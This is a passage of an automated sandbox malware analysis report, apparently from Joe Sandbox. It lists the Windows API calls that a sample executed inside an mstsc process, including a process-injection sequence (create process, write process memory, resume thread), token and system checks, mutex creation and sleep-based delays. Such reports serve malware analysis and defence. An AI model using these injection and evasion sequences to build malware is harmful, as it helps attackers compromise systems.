77 API calls 4621->4622 4623 68422 4622->4623 4624 68435 7 API calls 4623->4624 4625 68460 10 API calls 4623->4625 4624->4625 4625->4604

    Executed Functions

    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00106D80), ref: 0006E140
    • HeapAlloc.KERNEL32(00000000), ref: 0006E143
    • GetShellWindow.USER32 ref: 0006E155
    • GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0006E1BD
    • HeapAlloc.KERNEL32(00000000), ref: 0006E1C0
    • ReleaseCapture.USER32 ref: 0006E1D4
    • LoadLibraryA.KERNEL32(?), ref: 0006E1FE
    • GetProcAddress.KERNEL32(00000000), ref: 0006E205
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E219
    • HeapFree.KERNEL32(00000000), ref: 0006E222
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006E227
    • HeapFree.KERNEL32(00000000), ref: 0006E22A
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,7142434B,?,00000000,00106D80), ref: 0006E240
    • VirtualAlloc.KERNELBASE(00000000,7142424B,00003000,00000004), ref: 0006E261
    • NtQuerySystemInformation.NTDLL(00000005,00000000,7142434B,00000000), ref: 0006E276
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0006E2E1
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
      • Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
      • Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
      • Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
      • Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
      • Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
      • Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
      • Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
      • Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
      • Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
      • Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D
      • Part of subcall function 0006E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
      • Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
      • Part of subcall function 0006E60D: HeapAlloc.KERNEL32(00000000), ref: 0006E63B
      • Part of subcall function 0006E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654
      • Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
      • Part of subcall function 0006E60D: HeapFree.KERNEL32(00000000), ref: 0006E674
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • SetErrorMode.KERNELBASE(00000000), ref: 0006EFD4
    • SetErrorMode.KERNELBASE(00000000), ref: 0006EFDA
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006F006
    • HeapAlloc.KERNEL32(00000000), ref: 0006F009
    • GetCapture.USER32 ref: 0006F024
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 0006F088
    • HeapAlloc.KERNEL32(00000000), ref: 0006F08B
    • GetFocus.USER32 ref: 0006F09F
    • LoadLibraryA.KERNEL32(?), ref: 0006F0C9
    • GetProcAddress.KERNEL32(00000000), ref: 0006F0D0
    • GetCommandLineW.KERNEL32 ref: 0006F0D8
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F0F8
    • RtlAllocateHeap.NTDLL(00000000), ref: 0006F101
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0006F11C
    • GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006F168
    • HeapAlloc.KERNEL32(00000000), ref: 0006F16B
    • IsSystemResumeAutomatic.KERNEL32 ref: 0006F17B
    • GetProcessHeap.KERNEL32(?,00000000), ref: 0006F1A5
    • GetModuleHandleW.KERNEL32(00000000,?), ref: 0006F1B8
      • Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00069C4C
      • Part of subcall function 00069C2E: HeapAlloc.KERNEL32(00000000), ref: 00069C59
      • Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D22
      • Part of subcall function 00069C2E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D29
      • Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D43
      • Part of subcall function 00069C2E: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D74
      • Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,?), ref: 00069D85
      • Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,00070518), ref: 00069D8D
      • Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,?), ref: 00069D93
      • Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,00070520), ref: 00069D9B
      • Part of subcall function 00069C2E: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DAA
      • Part of subcall function 00069C2E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00069DCB
      • Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DD4
      • Part of subcall function 00069C2E: HeapFree.KERNEL32(00000000), ref: 00069DDB
      • Part of subcall function 00069C2E: GetThreadContext.KERNEL32(?,00010002), ref: 00069E05
      • Part of subcall function 00069C2E: SetLastError.KERNEL32(00000000), ref: 00069FC9
      • Part of subcall function 00069C2E: ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00069FF4
      • Part of subcall function 00069C2E: IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0006A01C
      • Part of subcall function 00069C2E: IsBadReadPtr.KERNEL32(?,00000004), ref: 0006A038
      • Part of subcall function 00069C2E: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0006A068
      • Part of subcall function 00069C2E: ResumeThread.KERNEL32(?), ref: 0006A07E
      • Part of subcall function 00069C2E: CloseHandle.KERNEL32(00000000), ref: 0006A0A2
      • Part of subcall function 00069C2E: TerminateProcess.KERNEL32(?,00000000), ref: 0006A0B5
      • Part of subcall function 00069C2E: CloseHandle.KERNEL32(?), ref: 0006A0BF
      • Part of subcall function 00069C2E: CloseHandle.KERNEL32(?), ref: 0006A0C9
      • Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A0D6
      • Part of subcall function 00069C2E: HeapFree.KERNEL32(00000000), ref: 0006A0DD
    • ExitProcess.KERNEL32 ref: 0006F1C9
      • Part of subcall function 0006EF8B: VirtualQuery.KERNEL32(0006EF8B,00000000,0000001C,?), ref: 0006EFAB
      • Part of subcall function 00061C80: LoadLibraryA.KERNEL32(?), ref: 00061CC1
      • Part of subcall function 00061C80: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00061CE1
      • Part of subcall function 00061C80: GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00061CF8
      • Part of subcall function 0006E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
      • Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
      • Part of subcall function 0006E897: GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
      • Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
      • Part of subcall function 0006E897: HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
      • Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
      • Part of subcall function 0006E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
      • Part of subcall function 0006E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
      • Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
      • Part of subcall function 0006E897: HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
      • Part of subcall function 0006E897: CloseHandle.KERNEL32(?), ref: 0006E957
    • GetVersion.KERNEL32 ref: 0006F201
    • HeapFree.KERNEL32(00000000), ref: 0006F49D
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0006A1A4
      • Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A1A7
      • Part of subcall function 0006A0EE: ReleaseCapture.USER32 ref: 0006A1C2
      • Part of subcall function 0006A0EE: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006A1F5
      • Part of subcall function 0006A0EE: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0006A206
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006A258
      • Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A25B
      • Part of subcall function 0006A0EE: GetForegroundWindow.USER32 ref: 0006A272
      • Part of subcall function 0006A0EE: wsprintfW.USER32 ref: 0006A2A6
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006A2E6
      • Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A2E9
      • Part of subcall function 0006A0EE: RevertToSelf.ADVAPI32 ref: 0006A300
      • Part of subcall function 0006A0EE: CoInitializeEx.OLE32(00000000,00000006), ref: 0006A362
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006A392
      • Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A395
      • Part of subcall function 0006A0EE: GetCapture.USER32 ref: 0006A3AC
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006A40B
      • Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A40E
      • Part of subcall function 0006A0EE: GetDoubleClickTime.USER32 ref: 0006A422
      • Part of subcall function 0006A0EE: LoadLibraryA.KERNEL32(57495761), ref: 0006A44C
      • Part of subcall function 0006A0EE: GetProcAddress.KERNEL32(00000000), ref: 0006A453
      • Part of subcall function 0006A0EE: GetLastError.KERNEL32 ref: 0006A45D
      • Part of subcall function 0006A0EE: Sleep.KERNEL32(00000064), ref: 0006A46C
      • Part of subcall function 0006A0EE: GetForegroundWindow.USER32 ref: 0006A472
      • Part of subcall function 0006A0EE: CoUninitialize.OLE32 ref: 0006A48B
      • Part of subcall function 0006A0EE: CloseHandle.KERNEL32(?), ref: 0006A494
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A4A3
      • Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4AC
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,57495761), ref: 0006A4B2
      • Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4B5
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0006A4BB
      • Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4BE
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,31653832), ref: 0006A4C4
      • Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4C7
      • Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,?), ref: 0006A4CD
      • Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4D0
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006F214
    • HeapFree.KERNEL32(00000000), ref: 0006F217
    • GetProcessHeap.KERNEL32(00000008,0000009D), ref: 0006F2D1
    • HeapAlloc.KERNEL32(00000000), ref: 0006F2D4
    • GetActiveWindow.USER32 ref: 0006F2EB
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006F374
    • HeapAlloc.KERNEL32(00000000), ref: 0006F377
    • GetModuleHandleW.KERNEL32(00000000), ref: 0006F38D
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F3BF
    • HeapAlloc.KERNEL32(00000000), ref: 0006F3C2
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F3D4
    • HeapAlloc.KERNEL32(00000000), ref: 0006F3D7
    • ExpandEnvironmentStringsW.KERNEL32(?,KCBqiNhR7x,00000104), ref: 0006F405
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000005,00000104), ref: 0006F410
      • Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
      • Part of subcall function 0006BE1A: HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
      • Part of subcall function 0006BE1A: GetFocus.USER32 ref: 0006BE7C
      • Part of subcall function 0006BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
      • Part of subcall function 0006BE1A: lstrlenA.KERNEL32(?), ref: 0006BEC9
      • Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
      • Part of subcall function 0006BE1A: HeapFree.KERNEL32(00000000), ref: 0006BEF1
    • Sleep.KERNEL32(000000FF), ref: 0006F4A1
      • Part of subcall function 0006B8CA: PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0006F429), ref: 0006B8D9
    • StrStrIW.SHLWAPI(7142434B), ref: 0006F44D
    • StrStrIW.SHLWAPI(00000005), ref: 0006F45C
      • Part of subcall function 000619C7: Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A14
      • Part of subcall function 000619C7: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A24
      • Part of subcall function 000619C7: VirtualProtect.KERNEL32(00072000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A85
      • Part of subcall function 000619C7: VirtualProtect.KERNEL32(00072000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A9F
      • Part of subcall function 000619C7: GlobalAddAtomW.KERNEL32 ref: 00061ABF
      • Part of subcall function 000619C7: AddAtomW.KERNEL32 ref: 00061ACB
      • Part of subcall function 000619C7: GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061AFB
      • Part of subcall function 000619C7: HeapFree.KERNEL32(00000000), ref: 00061B02
      • Part of subcall function 0006890F: lstrlenW.KERNEL32(00106D80,76AD46E9,7142434B,76E6FE8D), ref: 00068921
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00068941
      • Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068944
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,?), ref: 00068963
      • Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068966
      • Part of subcall function 0006890F: lstrcpyW.KERNEL32(00000000,?), ref: 0006897B
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000021), ref: 000689BB
      • Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 000689BE
      • Part of subcall function 0006890F: GetClipboardOwner.USER32 ref: 000689D2
      • Part of subcall function 0006890F: GetTickCount.KERNEL32(00000005), ref: 000689FE
      • Part of subcall function 0006890F: wsprintfW.USER32 ref: 00068A0F
      • Part of subcall function 0006890F: wsprintfW.USER32 ref: 00068A1F
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00068A33
      • Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068A36
      • Part of subcall function 0006890F: GetTickCount.KERNEL32 ref: 00068A47
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000044), ref: 00068AE0
      • Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068AE3
      • Part of subcall function 0006890F: GetClipboardSequenceNumber.USER32 ref: 00068AF7
      • Part of subcall function 0006890F: wsprintfA.USER32 ref: 00068B2D
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00068B60
      • Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B67
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B76
      • Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B79
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00068B84
      • Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B87
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B90
      • Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B93
      • Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B9F
      • Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068BA2
      • Part of subcall function 0006EE9B: GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0006EF0F
      • Part of subcall function 0006EE9B: HeapAlloc.KERNEL32(00000000), ref: 0006EF12
      • Part of subcall function 0006EE9B: GetForegroundWindow.USER32 ref: 0006EF23
      • Part of subcall function 0006EE9B: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0006EF58
      • Part of subcall function 0006EE9B: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0006EF6B
      • Part of subcall function 0006EE9B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006EF73
      • Part of subcall function 0006EE9B: HeapFree.KERNEL32(00000000), ref: 0006EF76
      • Part of subcall function 0006EE9B: ExitProcess.KERNEL32 ref: 0006EF84
    • CreateThread.KERNEL32(00000000,00000000,0006C737,00000000,00000000,00000000), ref: 0006F47A
    • CloseHandle.KERNEL32(00000000), ref: 0006F481
    • GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006F48A
    • HeapFree.KERNEL32(00000000), ref: 0006F493
    • GetProcessHeap.KERNEL32(00000000,00000005), ref: 0006F49A
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006C0CB
    • HeapAlloc.KERNEL32(00000000), ref: 0006C0CE
    • IsSystemResumeAutomatic.KERNEL32 ref: 0006C0FA
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C162
    • HeapAlloc.KERNEL32(00000000), ref: 0006C165
    • GetClipboardSequenceNumber.USER32 ref: 0006C18A
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0006C1C0
    • GetProcAddress.KERNEL32(00000000), ref: 0006C1C7
    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0006C1E2
    • GetSystemInfo.KERNEL32(?), ref: 0006C1F8
    • GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0006C30F
    • HeapAlloc.KERNEL32(00000000), ref: 0006C312
    • GetDesktopWindow.USER32 ref: 0006C32E
    • RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0006C365
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006C3E0
    • HeapAlloc.KERNEL32(00000000), ref: 0006C3E7
    • GetClipboardViewer.USER32 ref: 0006C403
    • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0006C448
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C4A1
    • HeapAlloc.KERNEL32(00000000), ref: 0006C4A8
    • CountClipboardFormats.USER32 ref: 0006C4C0
    • StrStrIW.SHLWAPI(?,00000000), ref: 0006C4F8
    • Sleep.KERNEL32(00002710), ref: 0006C505
    • StrStrIW.SHLWAPI(?,00000000), ref: 0006C514
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C51C
    • HeapFree.KERNEL32(00000000), ref: 0006C529
    • RegCloseKey.ADVAPI32(?), ref: 0006C536
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C540
    • HeapFree.KERNEL32(00000000), ref: 0006C547
    • Sleep.KERNELBASE(00002710), ref: 0006C56E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C59A
    • HeapFree.KERNEL32(00000000), ref: 0006C59D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5A3
    • HeapFree.KERNEL32(00000000), ref: 0006C5A6
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5B2
    • HeapFree.KERNEL32(00000000), ref: 0006C5B5
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
    • GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
    • GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
    • GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
    • GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
    • ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
    • HeapAlloc.KERNEL32(00000000), ref: 00064608
    • GetCapture.USER32 ref: 00064617
    • StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
    • LocalFree.KERNEL32(76AD46E9), ref: 0006465B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
    • HeapFree.KERNEL32(00000000), ref: 0006466B
    • GlobalFree.KERNEL32(00000000), ref: 00064675
    • CloseHandle.KERNEL32(000619F5), ref: 0006467F
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
    • HeapAlloc.KERNEL32(00000000), ref: 00067530
    • GetMessageTime.USER32 ref: 00067544
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
    • HeapAlloc.KERNEL32(00000000), ref: 000675A1
    • IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
    • GetProcAddress.KERNEL32(00000000), ref: 000675ED
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
    • HeapFree.KERNEL32(00000000), ref: 0006760A
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
    • HeapFree.KERNEL32(00000000), ref: 00067612
    • OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
    • IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
    • CloseHandle.KERNEL32(00000000), ref: 0006764D
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
    • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
    • GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
    • GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
    • HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
    • GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
    • GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
    • HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
    • CloseHandle.KERNEL32(?), ref: 0006E957
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 00064521: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
      • Part of subcall function 00064521: GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
      • Part of subcall function 00064521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
      • Part of subcall function 00064521: GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
      • Part of subcall function 00064521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
      • Part of subcall function 00064521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
      • Part of subcall function 00064521: GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
      • Part of subcall function 00064521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
      • Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
      • Part of subcall function 00064521: HeapAlloc.KERNEL32(00000000), ref: 00064608
      • Part of subcall function 00064521: GetCapture.USER32 ref: 00064617
      • Part of subcall function 00064521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
      • Part of subcall function 00064521: LocalFree.KERNEL32(76AD46E9), ref: 0006465B
      • Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
      • Part of subcall function 00064521: HeapFree.KERNEL32(00000000), ref: 0006466B
      • Part of subcall function 00064521: GlobalFree.KERNEL32(00000000), ref: 00064675
      • Part of subcall function 00064521: CloseHandle.KERNEL32(000619F5), ref: 0006467F
      • Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
      • Part of subcall function 0006BE1A: HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
      • Part of subcall function 0006BE1A: GetFocus.USER32 ref: 0006BE7C
      • Part of subcall function 0006BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
      • Part of subcall function 0006BE1A: lstrlenA.KERNEL32(?), ref: 0006BEC9
      • Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
      • Part of subcall function 0006BE1A: HeapFree.KERNEL32(00000000), ref: 0006BEF1
    • Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A14
    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A24
